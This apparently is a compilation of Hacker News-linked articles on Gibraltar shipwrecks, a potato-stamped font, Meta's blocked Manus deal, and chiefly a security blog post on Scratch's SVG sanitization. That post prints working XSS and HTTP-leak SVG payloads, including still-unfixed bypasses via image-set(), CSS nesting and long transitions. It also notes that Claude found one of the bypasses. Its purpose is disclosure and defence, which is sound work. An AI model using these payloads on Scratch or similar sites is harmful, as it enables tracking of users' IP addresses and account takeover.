- **Source**: [https://www.theguardian.com/science/2026/apr/15/hidden-treasures-spanish-archaeologists-discover-trove-of-ancient-shipwrecks-in-bay-of-gibraltar](https://www.theguardian.com/science/2026/apr/15/hidden-treasures-spanish-archaeologists-discover-trove-of-ancient-shipwrecks-in-bay-of-gibraltar)
- **Site**: The Guardian
- **Author**: Sam Jones
- **Published**: 2026-04-15
- **HN activity**: 83 points · [14 comments](https://news.ycombinator.com/item?id=47907175)
- **Length**: 1.0K words (~5 min read)
- **Language**: en

Spanish archaeologists exploring the bay that curves between the southern port of Algeciras and the Rock of Gibraltar have documented the wrecks of more than 30 ships that came to grief near the Pillars of Hercules between the fifth century BC and the second world war.

Over the millennia, the bay, which sits at the north end of the strait of Gibraltar that separates [Europe](https://www.theguardian.com/world/europe-news) from Africa, has swallowed everything from Phoenician and Roman vessels to British, Spanish, Venetian and Dutch ships – as well as the odd aeroplane.

A [three-year project](https://produccioncientifica.uca.es/documentos/69a09b7dbb968f5c160c69bf) led by the University of Cádiz has now identified 151 archaeological sites in the bay, among them 134 shipwrecks. To date, the researchers and their colleagues from the University of Granada have worked to document 34 of those wrecks.

![A pair of team members uses a suction hose to clean sediment from a wreck in the bay of Algeciras](https://i.guim.co.uk/img/media/e6061b1b8fb08d4492a358f75035d4a4727ebe7d/0_0_1600_1200/master/1600.jpg?width=445&dpr=1&s=none&crop=none)

A pair of team members uses a suction hose to clean sediment from a wreck in the Bay of Algeciras. Photograph: Felipe Cerezo Andreo

The oldest is that of a Punic era ship dating to the fifth century BC, while other finds include 23 Roman ships, two late Roman ships, four medieval ships and 24 vessels from the early modern period.

Between them, the sunken items – which include an agile and fearsome 18th-century Spanish gunboat and the engine and propeller of a plane from the 1930s – tell the story of war, trade, exploration and settlement in and around one of the most strategically important waterways in the world.

Felipe Cerezo Andreo, a professor of archaeology at the University of Cádiz who led the investigation, which is called Project Herakles, said the area has long been a watery crossroads.

“It’s one of those bottlenecks through which ships have always had to pass, whether on commercial shipping routes, voyages of discovery, or due to armed conflicts,” he said.

![An outlined wreck is seen from above a few metres offshore in the Bay of Algeciras](https://i.guim.co.uk/img/media/46657dd0fbcf633f91f828470c74342a8d06da64/0_0_4000_2250/master/4000.jpg?width=445&dpr=1&s=none&crop=none)

An outlined wreck is seen from above a few metres offshore in the Bay of Algeciras. Photograph: Alejandro Mañas

“There are really few places in the Mediterranean that have this kind of concentration and such a significant variety of archaeological remains, especially in terms of different cultures or different nations. We have Dutch, Venetian, Spanish, and of course English ships – ships of practically every nationality – because they all passed through the strait, whether heading out to the Atlantic for trade, or entering the Mediterranean from northern Europe or other regions.”

Cerezo said the researchers were particularly excited to have documented three medieval vessels that could shed light on seafaring during the late period of Islamic rule in southern [Spain](https://www.theguardian.com/world/spain).

Although the team has come across large ships from the 16th and 17th centuries, one of the most exciting finds has been the wreck of the Puente Mayorga IV, a small, late 18th-century gunboat of a type used for rapid, stealthy attacks on British ships of the line around Gibraltar. The attack craft would often disguise themselves as fishing boats before flinging off their netting and firing their prow-mounted cannon at their enemies.

![A book-shaped box that was found in the wreck of the 18th century Spanish gunboat Puente Mayorga IV](https://i.guim.co.uk/img/media/aeeac04a669965bd9fd37cbe8831182cd67a0fca/0_0_4608_3456/master/4608.jpg?width=445&dpr=1&s=none&crop=none)

A book-shaped box that was found in the wreck of the 18th-century Spanish gunboat Puente Mayorga IV. Photograph: Felipe Cerezo Andreo

Despite being frequently mentioned in contemporary reports, such boats have been little studied by archaeologists.

Cerezo himself was delighted to come across one of the Puente Mayorga IV’s less obvious treasures during an excavation. What he initially took to be a miraculously preserved book turned out to be a book-shaped wooden box with a hollow space inside.

“At first, we thought it could be used to hide documents, and we thought it might have something to do with espionage,” said the archaeologist. “Was the officer who carried it mapping the position of an enemy vessel?” Sadly not. After careful examination, the box turned out to contain a pair of wooden combs, suggesting the officer may have been more preoccupied with grooming than spying.

Cerezo and his colleagues hope the Andalucían regional government and Spain’s culture ministry will act to preserve and protect the sites in the Bay of Algeciras – known to English-speakers as the Bay of Gibraltar – which are at risk from port development, dredging and dock construction. The climate emergency is already proving a threat, bringing both rising sea levels that are [altering sediment layers and exposing archaeological sites](https://www.marinebiodiversity.ca/rising-seas-are-washing-away-ancient-underwater-treasures-heres-what-scientists-are-doing/#google_vignette), and [an invasive algae that grows over rocks and wrecks alike](https://www.ceab.csic.es/en/lalga-asiatica-rugulopteryx-okamurae-detectada-al-litoral-de-barcelona/).

![A member of the Herakles Project team examines a wreck in the Bay of Algeciras](https://i.guim.co.uk/img/media/fdb9741aea7be6cdae795ad2d057a1028b2548df/0_0_5568_4176/master/5568.jpg?width=445&dpr=1&s=none&crop=none)

A member of the Herakles Project team examines a wreck in the Bay of Algeciras. Photograph: Herakles Project/Supplied

In order to share their finds and raise awareness of the importance of preserving them, the researchers have made virtual models and 360-degree videos of the sites, which they share with the public online and in local museums and town halls.

“We bring these goggles so that people who don’t dive can put them on and have a dryland diving experience,” said Cerezo. “Although people sometimes imagine they’re going to see [a wrecked treasure ship like the Unicorn in Tintin](https://www.tintin.com/en/albums/red-rackham-s-treasure), the sites tend not to be that well preserved. The state of them can sometimes be a bit disappointing, but it’s important that people know what’s going on. And showing this to people creates a demand for the protection of these sites.”

[map of the Bay of Gibraltar](https://interactive.guim.co.uk/uploader/embed/2026/04/algecirasbay-zip/giv-32554pl2OCOGZ7luo/)

The waters of the bay offer an unparalleled microcosm of thousands of years of maritime and cultural development, said Cerezo.

“What we have here is a very small space that allows us to analyse the evolution of maritime history throughout practically the whole of the Iberian peninsula and north Africa.

“It tells us a story that we sometimes forget, which is that maritime societies, or peoples who have lived in coastal areas, have had a very intense relationship with the sea and have lived on the sea. And being able to study these kinds of archaeological remains – to document them, to learn about them in situ and not just through the objects that sometimes end up in a museum, but to understand them in their context – allows us to carry out that process of reconstruction and to tell the story of these people.”

---

## [HN-TITLE] 18. The woes of sanitizing SVGs

- **Source**: [https://muffin.ink/blog/scratch-svg-sanitization/](https://muffin.ink/blog/scratch-svg-sanitization/)
- **Site**: muffin.ink
- **Submitter**: varun\_ch (Hacker News)
- **Submitted**: 2026-04-27 15:31 UTC (Hacker News)
- **HN activity**: 190 points · [76 comments](https://news.ycombinator.com/item?id=47922957)
- **Length**: 2.9K words (~13 min read)
- **Language**: en

Scratch has a long history of SVG-related vulnerabilities. The source of these is that Scratch parses user-generated (i.e. attacker-controlled) content into an `<svg>` element and appends it into the main document for various operations (e.g. measuring the SVG's bounding box more reliably than the `viewBox` or width/height attributes allow).

No matter how briefly the SVG remains in the main document, this is an inherently unsafe operation. Scratch's approach to making this safe has been to build increasingly complex infrastructure around parsing the SVG and the markup within to remove dangerous parts.

I think Scratch's approach to SVG sanitization is doomed. To explain, we have to take a trip through the history of SVG sanitization in Scratch to see how well it has worked so far.

## 2019: XSS via &lt;script&gt; tag

In 2019, a few months after the initial release of Scratch 3, Scratch discovered that SVGs can contain `<script>` tags that would be executed when the SVG loads. This is known as a cross-site scripting (XSS) vulnerability.

In Scratch terms, an XSS allows an attacker to take actions on behalf of anyone that loads their project. For example, the attacker can post comments, delete projects, or otherwise try to take over the victim's account. In Scratch Desktop, XSS is elevated to arbitrary code execution because Scratch Desktop enables Electron's dangerous [Node.js integration](https://muffin.ink/blog/bananatron#node-js-integration) feature. (TurboWarp Desktop has not enabled that feature since v0.2.0 from March 2021)

Example from Scratch's test suite:

```
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
  <circle cx="250" cy="250" r="50" fill="red" />
  <script type="text/javascript"><![CDATA[
      alert('from the svg!')
  ]]></script>
</svg>
```

This [was fixed](https://github.com/scratchfoundation/scratch-svg-renderer/commit/78cc7ea22887cdb2d3e3a00b23557a37251632f8) by using a regular expression to remove script tags.
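A naive regex-based stripper, in the spirit of that fix, shows why the approach is fragile. This is a hypothetical sketch, not Scratch's actual code:

```javascript
// Hypothetical sketch of a regex-based <script> remover, similar in spirit
// to the 2019 fix. NOT Scratch's actual implementation.
const stripScripts = (svgText) =>
  svgText.replace(/<script[\s\S]*?<\/script>/g, '');

// The case-sensitive pattern removes lowercase tags...
stripScripts('<svg><script>alert(1)</script></svg>'); // → '<svg></svg>'

// ...but a capitalized <SCRIPT> tag slips straight through unchanged.
stripScripts('<svg><SCRIPT>alert(1)</SCRIPT></svg>');
```

As the next section shows, exactly this kind of oversight was exploited a year later.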

Surely, with this change, SVGs are now fully safe and will require no further security fixes.

## 2020: XSS via oversights in previous fix (CVE-2020-7750)

In 2020, [apple502j discovered](https://scratch.mit.edu/discuss/topic/449794/) that XSS was still possible. It turns out that the previous fix was utterly defective: because the regex is case-sensitive, it can be bypassed simply by capitalizing `<SCRIPT>`, among several other bypasses. Even if the regex were implemented correctly, it would still not work, because there are other ways to embed JavaScript in an SVG. For example, one can use an inline event handler:

```
<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
    <foreignObject x="1" y="1" width="1" height="1">
        <img
            xmlns="http://www.w3.org/1999/xhtml"
            src="data:any invalid URL"
            onerror="alert(1)"
        />
    </foreignObject>
</svg>
```

This [was fixed](https://github.com/scratchfoundation/scratch-svg-renderer/commit/9ebf57588aa596c4fa3bb64209e10ade395aee90) by using [DOMPurify](https://github.com/cure53/dompurify) to remove scripts from the SVG before `scratch-svg-renderer` appends it into the document.

Surely, with this change, SVGs are now fully safe and will require no further security fixes.

## 2022: HTTP leak via &lt;image&gt; href

In 2022, it was discovered that using the `href` property on an `<image>` element, an attacker can create an SVG that will invoke an external request when it is loaded. It turns out that while DOMPurify removes executable code, it [does not protect against HTTP leaks](https://github.com/cure53/DOMPurify/wiki/Security-Goals-&-Threat-Model#non-goals) because "there are too many ways of doing that and our tests showed that it cannot be done reliably".

In Scratch terms, an HTTP leak means that a Scratch user can log the IP of anyone that loads their project, possibly revealing information such as location or school district. The victim would not need to click on any links; the IP log happens just by loading the project. Scratch seems to consider this a security bug, and I agree.

Example:

```
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="https://example.com/ping"/>
</svg>
```

This [was fixed](https://github.com/scratchfoundation/scratch-editor/commit/8bcef3bd7d1c80fd6afc8ada273e8346a802ccf1) by adding DOMPurify hooks to remove `href` properties from all elements if the URL refers to a remote website.
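The core of such a hook is deciding whether a given URL is remote. A minimal sketch of that check (the function name and hardcoded origin are my own illustration, not Scratch's code):

```javascript
// Hypothetical sketch of the kind of check a DOMPurify hook could apply to
// every href/xlink:href attribute. Names here are illustrative.
function isRemoteUrl(href) {
  // Fragment references like "#gradient" stay inside the SVG itself.
  if (href.startsWith('#')) return false;
  let url;
  try {
    // Resolve relative URLs against the page's own origin.
    url = new URL(href, 'https://scratch.mit.edu');
  } catch {
    return false; // an unparseable URL can't trigger a request
  }
  // data: URLs embed their payload and never hit the network.
  if (url.protocol === 'data:') return false;
  // Anything resolving to another origin could leak the viewer's IP.
  return url.origin !== 'https://scratch.mit.edu';
}
```

Note how many special cases even this tiny sketch needs; each one is a place for a future bug to hide.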

Surely, with this change, SVGs are now fully safe and will require no further security fixes.

## 2023: HTTP leak via CSS @import

In 2023, it was discovered that using a CSS `@import` statement inside of a `<style>` element, an attacker could create a project that invokes external requests when the project loads. Example:

```
<svg xmlns="http://www.w3.org/2000/svg">
  <style>
    @import url("https://example.com/ping");
  </style>
</svg>
```

This [was fixed](https://github.com/scratchfoundation/scratch-svg-renderer/commit/a3ba9eb15036b6983a6b7713d0f1d5114e00329f) by integrating a CSS parser written in JavaScript to remove dangerous parts of the CSS. They would parse all stylesheets contained in SVGs, remove any `@import` statements, and convert the CSS back to a string if any changes were made so that the dangerous stuff is removed.
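Conceptually, the sanitizer's job here reduces to something like the sketch below. This is a deliberately simplified string-level version; Scratch used a real CSS parser rather than a regex, but the goal is the same, and this version shares the general fragility of the approach:

```javascript
// Simplified sketch of @import removal. NOT Scratch's actual code, which
// parses the stylesheet into a syntax tree before removing rules.
function removeCssImports(cssText) {
  // Matches e.g. @import url("https://example.com/ping");
  return cssText.replace(/@import\b[^;]*;?/g, '');
}
```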

Surely, with this change, SVGs are now fully safe and will require no further security fixes.

## 2024: XSS via Paper.js

In 2024, I discovered [an XSS](https://muffin.ink/blog/paperjs-xss) in [Paper.js](https://github.com/paperjs/paper.js), a library Scratch uses in the costume editor. It turns out that while Scratch sanitized SVGs before working on them in scratch-svg-renderer, unsanitized SVGs were still being passed to Paper.js. This has largely the same impact as the 2020 scratch-svg-renderer XSS, but occurs when using the costume editor instead of when initially opening a project. Example:

```
<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" data-paper-data="any invalid JSON">
    <foreignObject x="1" y="1" width="1" height="1">
        <img
            xmlns="http://www.w3.org/1999/xhtml"
            src="data:any invalid URL"
            onerror="alert(1)"
        />
    </foreignObject>
</svg>
```

This [was somewhat fixed](https://github.com/scratchfoundation/scratch-editor/pull/251) on an extremely delayed timeline by extending the existing SVG sanitization code to run when loading an SVG, not just when processing it in scratch-svg-renderer. This means that Paper.js will only receive SVGs that have already been sanitized.

I say "somewhat fixed" because I'm not sure if that sanitization ever runs for server-downloaded SVGs. Scratch support told me they "have protections against this that are handled on our server side" which may make that redundant. I have never seen any evidence of such protections while developing proof-of-concepts, but maybe they are real.

Surely, with this change, SVGs are now fully safe and will require no further security fixes.

## 2025: HTTP leak via CSS url()

In 2025, it was discovered that using `url()` inside of certain CSS rules, an attacker can create an SVG that will invoke an external request when it is loaded. Examples:

```
<svg xmlns="http://www.w3.org/2000/svg">
    <!-- inline style -->
    <rect style="background-image: url(https://example.com/ping)" />

    <!-- can also use a <style> element -->
    <style>
        .img {
            background-image: url("https://example.com/ping");
        }
    </style>
    <rect class="img" />
</svg>
```

This [was fixed](https://github.com/scratchfoundation/scratch-editor/commit/2756ebd4275987e2f99791ae6123daea1fb28ce7) by substantially expanding the SVG sanitization code to also search for any usage of `url()` and remove any styles or attributes referencing external URLs.

Surely, with this change, SVGs are now fully safe and will require no further security fixes.

## 2026: HTTP leak via several bugs in the previous code

In 2026, it was discovered that using `url()` inside of certain CSS rules, it is still possible for an attacker to create an SVG that will invoke an external request when it is loaded. It turns out there were at least three unique bugs that each allowed an HTTP leak:

- Did not account for CSS allowing one to write out `url(...)` using escape codes
- Did not handle a `style` attribute having more than one `url(...)` inside it, where the first one is safe but the second one is not
- Did not handle `url()` defined in a CSS variable and referenced via `var(--name)`

Examples:

```
<svg xmlns="http://www.w3.org/2000/svg">
    <circle fill="\75\72\6c(https://example.com/ping)" />
    <rect style="/* url(#safe_url) */ background-image: url(https://example.com/ping)" />
    <style>
        :root {
            --example: url(https://example.com/ping);
        }
        .img {
            background-image: var(--example);
        }
    </style>
    <rect class="img" />
</svg>
```
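The escape-code bypass in the first line works because CSS lets any character be written as a backslash followed by its code point in hex, so `\75\72\6c` spells out `url`. A simplified decoder makes this concrete (real CSS escapes allow up to six hex digits plus one optional trailing whitespace character, which this sketch handles, but it ignores other edge cases):

```javascript
// Illustrative decoder for CSS hex escape sequences like \75\72\6c ("url").
// Simplified for demonstration; not a spec-complete CSS tokenizer.
function decodeCssEscapes(text) {
  return text.replace(/\\([0-9a-fA-F]{1,6})\s?/g, (_, hex) =>
    String.fromCodePoint(parseInt(hex, 16))
  );
}

decodeCssEscapes('\\75\\72\\6c(https://example.com/ping)');
// → 'url(https://example.com/ping)'
```

A sanitizer that scans only for the literal text `url(` never sees the escaped form, but the browser's tokenizer decodes it and fetches the URL anyway.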

This [was fixed](https://github.com/scratchfoundation/scratch-editor/commit/fbea3d199278c19f88023cdd48c83d6edd7cf81d) [by adding](https://github.com/scratchfoundation/scratch-editor/commit/6d20ec339f24367502bd326bb7580ddd6bcffe23) [a substantial amount](https://github.com/scratchfoundation/scratch-editor/commit/2570c393f8ca4e47ea6a905bbc0fa3f4db90e4df) [of additional complexity](https://github.com/scratchfoundation/scratch-editor/commit/b850a15d871adb67e150c89bd8c1a36fdc044251) [around code that](https://github.com/scratchfoundation/scratch-editor/commit/9442435c68699dd7af30aae23b9f725f627fb4a1) was already way too complex.

Surely, with this change, SVGs are now fully safe and will require no further security fixes.

## 2026: Full page restyling via long transitions

In 2026, it was discovered that through clever use of very long transitions and forcing the browser to restyle all elements, an attacker can apply arbitrary styles to the full Scratch page that last until refresh. Most uses of this have been "fun" things, but here are a few ideas for more evil things you might be able to do:

- Hiding the report button.
- Making the like/favorite buttons cover the entire page, so that users are tricked into clicking them.
- Display text telling the user that they need to open a website in a new tab to "verify" their account (some phishing page). Users are likely to trust the instructions because the message is coming from the real scratch.mit.edu.

Example project (not mine): [https://scratch.mit.edu/projects/1299571218/](https://scratch.mit.edu/projects/1299571218/)

This will probably get fixed at some point, but today what you'll see is this:

![Scratch project page, but all the page background colors are very obviously wrong.](https://muffin.ink/blog/scratch-svg-sanitization/blue.png)

This project uses two SVGs. The first one is the "trigger":

```
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="100">
  <rect x="0" y="0" width="200" height="100" fill="#111"></rect>
  <text x="100" y="55" fill="#0f0" font-size="12" text-anchor="middle">
    Trigger
  </text>

  <style>
    /* Force browser to recalc styles to activate first SVG */
    *, * *, * * *, * * * * {
      transform: translateX(1px) scale(10000) rotateY(45deg) perspective(1cm) !important;
      transition: all 9999s ease !important;
      filter: blur(0px) !important;
    }
  </style>
</svg>
```

The second one contains the styles to display:

```
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="100">
  <rect x="0" y="0" width="200" height="100" fill="#111"></rect>
  <text x="100" y="55" fill="#0f0" font-size="12" text-anchor="middle">
    Styles
  </text>

  <style>
    /* Global background blue */
    * {
      background-color: blue !important;
      color: white !important;
    }

    /* Project instructions/description styling */
    .project-description, .instructions-container {
      background-color: yellow !important;
      color: black !important;
      border: 10px solid red !important;
      transform: scale(1.1) !important;
    }
  </style>
</svg>
```

I won't pretend to fully understand what's going on here or why it works non-deterministically, but my general understanding is:

- The trigger SVG applies `transform` and `filter` to every element in the document to forcibly make the browser recompute all styles right away, applying styles from the other SVG.
- The trigger SVG applies a very long `transition` so that when the other SVG is removed, the styles will stick around for the duration of the "transition"

This is not fixed.

Surely, if this were fixed, SVGs would be fully safe and would require no further security fixes.

## 2026: HTTP leak via image-set()

I reported this one to Scratch in 2025. They didn't fix it, so whatever, I'll disclose it here. Any reasonable disclosure period lapsed 6 months ago.

Instead of using `url()`, an attacker can use `image-set()` to create an SVG that will invoke an external request when it is loaded. Examples:

```
<svg xmlns="http://www.w3.org/2000/svg">
    <!--
        image-set(...) can cause external resources to be requested without using url() at all.
    -->
    <style>
        .image-set-with-string-url {
            background-image: image-set("https://example.com/ping" 1x);
        }
    </style>
    <rect class="image-set-with-string-url" />

    <!--
        image-set(url(...)) works the same as image-set(...).
        This already gets blocked by the existing sanitization.
    -->
    <style>
        .image-set-with-inner-url-function {
            background-image: image-set(url(https://example.com/ping) 1x);
        }
    </style>
    <rect class="image-set-with-inner-url-function"></rect>

    <!--
        image-set() can also be used in inline style attributes.
    -->
    <rect style="background-image: image-set('https://example.com/ping' 1x)" />
</svg>
```

This is not fixed.

Surely, if this were fixed, SVGs would be fully safe and would require no further security fixes.

## 20XX: HTTP leak via new CSS features

I also reported this one to Scratch in 2025. This bug actually doesn't work today, but will in the future if browsers ever implement all of [CSS Units Level 4](https://www.w3.org/TR/css-values-4/) or [CSS Images Level 4](https://drafts.csswg.org/css-images-4/). Today, [Ladybird](https://ladybird.org/) is the only browser to implement either of these, but major browsers could implement them someday as well.

Instead of using `url()`, an attacker can use [`src()`](https://www.w3.org/TR/css-values-4/#example-a2ee15a6) or [`image()`](https://drafts.csswg.org/css-images-4/#funcdef-image) to create an SVG that will invoke an external request when it is loaded. Examples:

```
<svg xmlns="http://www.w3.org/2000/svg">
    <!--
        Everything in this file relies on features that are defined in the browser specs, but not yet implemented in any browser.
        In theory, future browsers might initiate requests when they see these styles.
    -->

    <!--
        CSS Units Level 4 defines src(...) as an alternative to url(...).
        Unlike url(), src()'s URL can be any expression, not just a constant string.
        Reference: https://www.w3.org/TR/css-values-4/#example-a2ee15a6
        Not implemented by any major browser today. (Only implemented in the experimental Ladybird browser)
    -->
    <style>
        .src-constant {
            background: src('https://example.com/ping');
        }
        .src-variable {
            --url: 'https://example.com/ping';
            background: src(var(--url));
        }
    </style>
    <rect class="src-constant" />
    <rect class="src-variable" />

    <!--
        CSS Images Level 4 defines image() as an alternative to url() for images.
        Reference: https://www.w3.org/TR/css-images-4/#image-notation
        Not implemented by any major browser today.
    -->
    <style>
        .image {
            background: image('https://example.com/ping', black);
        }
    </style>
    <rect class="image" />

    <!-- Same as above examples, but using inline styles -->
    <rect style="background: src('https://example.com/ping');" />
    <rect style="--url: 'https://example.com/ping'; background: src(var(--url));" />
    <rect style="background: image('https://example.com/ping', black);" />
</svg>
```

This is not fixed.

Surely, if this were fixed, SVGs would be fully safe and would require no further security fixes.

## This is unsustainable

Stacking more and more complexity into sanitization is clearly a doomed approach. We are more than 5 major revisions deep and yet there are still known holes. People are actively sharing projects on the Scratch website bypassing SVG sanitization. And the moment browsers decide to implement the latest CSS specs, even more holes will open up.

Furthermore, not all of these problems have clear solutions. For full page styling, both SVGs seem completely benign: there is no JavaScript or references to external resources. The fix would likely be to remove `transition` styles since the transitions would never run in Scratch anyway, but are you sure that's sufficient? Will you remember to also remove all the vendor-prefixed versions of `transition`? What about `animation` styles?

Some other possible cases that might allow more bypasses in the future:

- `css-tree` (the library Scratch uses to parse CSS) and the real CSS parsers in browsers might not completely match. If so, `css-tree` might parse CSS such that everything looks fine and thus nothing gets removed, but then the browser's real parser does recognize external content.
- Advanced new CSS features such as [`@property`](https://developer.mozilla.org/en-US/docs/Web/CSS/Reference/At-rules/@property) or [native nesting](https://developer.mozilla.org/en-US/docs/Web/CSS/Guides/Nesting/Using) that `css-tree` might not be able to meaningfully parse without constant updates.
- Browsers can always add new functions that can reference external content as they have already done with `image-set()` and the spec implies will happen for `src()` and `image()`. How will you keep up with the constant change in these specs to evaluate every new function and see if it could somehow allow referencing external content?

## An alternative

TurboWarp (a Scratch fork I work on) was unaffected by the 2026 HTTP leaks and full page restyling issue. This isn't because I found all the clever ways for an SVG to do something bad; in fact I [actually deleted](https://github.com/TurboWarp/scratch-svg-renderer/commit/ccc8890d808fd9116d0f93e7d76649b6dc6525e7) the CSS sanitization code entirely to make packaged projects 400KB smaller.

I implemented an alternative approach: sandboxing the SVG inside an iframe. First, we set up an iframe with a `sandbox` attribute of `allow-same-origin`. This blocks script execution inside the iframe, but still lets us interact with the contents inside.

Second, we set up the iframe with the following hardcoded HTML:

```
<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <meta http-equiv="Content-Security-Policy" content="default-src 'none'; style-src 'unsafe-inline' data:; font-src data:; img-src data:">
    </head>
    <body></body>
</html>
```

The inline [Content-Security-Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP) is set up to block all scripts and only allow loading safe resources from safe data URLs. We also still use DOMPurify to remove obviously evil things from the SVG. We then put the iframe into the document offscreen somewhere so that the measurement APIs Scratch needs will still work.
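Putting those pieces together, the setup could be sketched like this. The helper name and offscreen positioning are my own illustration; TurboWarp's actual implementation is in the forks linked below:

```javascript
// Hypothetical sketch of the sandboxed-iframe setup described above.
// NOT TurboWarp's exact code.
function createSvgSandbox(document) {
  const iframe = document.createElement('iframe');
  // allow-same-origin blocks script execution in the frame while keeping
  // its contentDocument accessible for measurement APIs.
  iframe.setAttribute('sandbox', 'allow-same-origin');
  iframe.srcdoc = `<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <meta http-equiv="Content-Security-Policy"
          content="default-src 'none'; style-src 'unsafe-inline' data:; font-src data:; img-src data:">
  </head>
  <body></body>
</html>`;
  // Park the frame offscreen so layout and bounding-box APIs still work.
  iframe.style.position = 'absolute';
  iframe.style.left = '-9999px';
  return iframe;
}
```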

This approach gives us some very nice properties:

- **The browser uses its pre-existing code to do the hard part for us.**
  
  TurboWarp doesn't need to know about all the ways for an SVG to make a request. Your browser already knows this and will enforce it for any new APIs that get added.
  
  Real-world CSP implementations are not perfect and have holes. However, those holes generally are weird edge cases that require the attacker to already be executing JavaScript in some way. Those vulnerabilities are also considered browser security issues so they have bug bounties attached to them.
- **The SVG can't affect the main document.**
  
  Consider the case of the full page restyling. Because the SVG is trapped inside of an iframe, the only thing it can restyle is the iframe. The styles in the iframe do not matter, so that's perfectly fine.

You can find our code here:

- [scratch-svg-renderer fork](https://github.com/TurboWarp/scratch-svg-renderer/commit/0611932d92755293155b63443a34addf08498ce1)
- [paper.js fork](https://github.com/TurboWarp/paper.js/commit/a3a4a8c2e276552dc12ad18a22c07d1a5d4af100)

Maybe you can do some other interesting stuff with shadow DOM or other web APIs, but we found that the iframe is working fine for us.

The below sections will cover any new issues I become aware of after publication.

## 2026-04-12: Claude finds HTTP leak via CSS nesting relaxed syntax

After publishing this, I was curious how good current language models are at finding these bugs. I told Claude Opus 4.6 to clone the [scratch-editor repo](https://github.com/scratchfoundation/scratch-editor/), look at the recent SVG renderer changes, and see if there were any holes. The results were interesting:

- Claude discovered on its own that `image-set(...)` is not sanitized and can cause HTTP leaks.
- **Claude discovered a new issue not described in the original version of this post.**

The bug involves CSS nesting, which can appear in two forms. The nested style can prefix the selector with an `&` or instead just not prefix it (the latter being known as "relaxed" syntax). Modern browsers interpret both of the below identically.

```
g {
    & rect {
        background-image: url(https://example.com/ping);
    }
}

g {
    rect {
        background-image: url(https://example.com/ping);
    }
}
```

`css-tree` is capable of parsing the `&`-prefixed version into a meaningful syntax tree that Scratch can sanitize. However, it turns out that `css-tree` does not know how to parse the relaxed version. The entire `g { ... }` block is parsed as a "raw text" node which Scratch's code will not sanitize. Full example SVG:

```
<svg xmlns="http://www.w3.org/2000/svg">
    <style>
        g { rect { background-image: url(https://example.com/ping); } }
    </style>
    <g><rect></rect></g>
</svg>
```

Earlier in this post, I mentioned that "`css-tree` and the real CSS parsers in browsers might not completely match". This is a real-world example of that kind of bug allowing CSS to bypass sanitization. Note that `css-tree` currently has 48 open issues and certainly many more unknown ones. I believe depending on `css-tree` to be a perfect parser is a hopeless path that will continue to result in more vulnerabilities. TurboWarp's SVG sandbox fixed this bug before I even knew it existed.

This is not fixed. The [`css-tree` issue](https://github.com/csstree/csstree/issues/268) for this bug has been open since December 2023.

Surely, if this were fixed, SVGs would be fully safe and would require no further security fixes.

---

## [HN-TITLE] 19. HVD Bodedo

- **Source**: [https://www.hvdfonts.com/fonts/hvd-bodedo](https://www.hvdfonts.com/fonts/hvd-bodedo)
- **Site**: HvD Fonts
- **Submitter**: cainxinth (Hacker News)
- **Submitted**: 2026-04-26 14:16 UTC (Hacker News)
- **HN activity**: 4 points · [0 comments](https://news.ycombinator.com/item?id=47910527)
- **Length**: 579 words (~3 min read)
- **Language**: en

HVD Bodedo

![Bodedo Ds](https://www.hvdfonts.com/public/Bodedo_DS.jpg)

Is it possible to carve a Bodoni out of potatoes? We tried it…

Type design is mostly precisely drawing vector curves, printing proofs and judging the grey value with a reducing lens. But it can also be a group of friends coming together for an experimental typographic evening. We had the idea to make a Bodoni interpretation with potato stamps, so we bought 8 kg of potatoes and some knives and carved for one long, long evening in the kitchen. When we finally had the full alphabet, we stamped it on paper, made a font out of the result and called it Bodedo.

Just 1 Style

Aa

Regular

![Bodedo](https://www.hvdfonts.com/public/gallery/Bodedo_01_171206_230323.jpg)

Bodedo

![Printing](https://www.hvdfonts.com/public/gallery/Bodedo_05.jpg)

Printing

![Halfway done](https://www.hvdfonts.com/public/gallery/Bodedo_04.jpg)

Halfway done

![Cutting](https://www.hvdfonts.com/public/gallery/Bodedo_02.jpg)

Cutting

![Printed & Scanned](https://www.hvdfonts.com/public/gallery/Bodedo_06.jpg)

Printed & Scanned

“I never thought that I will see this typeface in so many supermarkets all over the world.”


![](https://www.hvdfonts.com/public/worldmap.svg)

HVD Bodedo has 208 characters and supports 22 languages:

Afrikaans, Basque, Breton, Catalan, Danish, Dutch, English, Finnish, French, Gaelic (Irish, Scots), German, Icelandic, Indonesian, Irish, Italian, Norwegian, Portuguese, Saami (Southern), Spanish, Swahili, Swedish.

---

## [HN-TITLE] 20. China blocks Meta's acquisition of AI startup Manus

- **Source**: [https://www.cnbc.com/2026/04/27/meta-manus-china-blocks-acquisition-ai-startup.html](https://www.cnbc.com/2026/04/27/meta-manus-china-blocks-acquisition-ai-startup.html)
- **Site**: CNBC
- **Author**: April Roach, Evelyn Cheng, Kai Nicol-Schwarz
- **Published**: 2026-04-27
- **HN activity**: 322 points · [216 comments](https://news.ycombinator.com/item?id=47920315)
- **Length**: 467 words (~3 min read)
- **Language**: en

China's state planner on Monday called for [Meta](https://www.cnbc.com/quotes/META/) to unwind its [$2 billion acquisition](https://www.cnbc.com/2025/12/30/meta-acquires-singapore-ai-agent-firm-manus-china-butterfly-effect-monicai.html) of Manus, a Singaporean artificial intelligence startup with Chinese roots.

The decision to prohibit foreign investment in Manus was made in accordance with laws and regulations, the National Development and Reform Commission said in a brief statement. It added that it has asked the parties involved to withdraw the acquisition transaction.

A Meta spokesperson said that the transaction "complied fully with applicable law."

"We anticipate an appropriate resolution to the inquiry," the spokesperson added. Shares of Meta closed 0.53% higher on Monday.

The deal had attracted scrutiny from both China and Washington, as lawmakers in the U.S. have prohibited American investors from backing Chinese AI companies directly. Meanwhile, Beijing has increased efforts to discourage Chinese AI founders from moving business offshore.

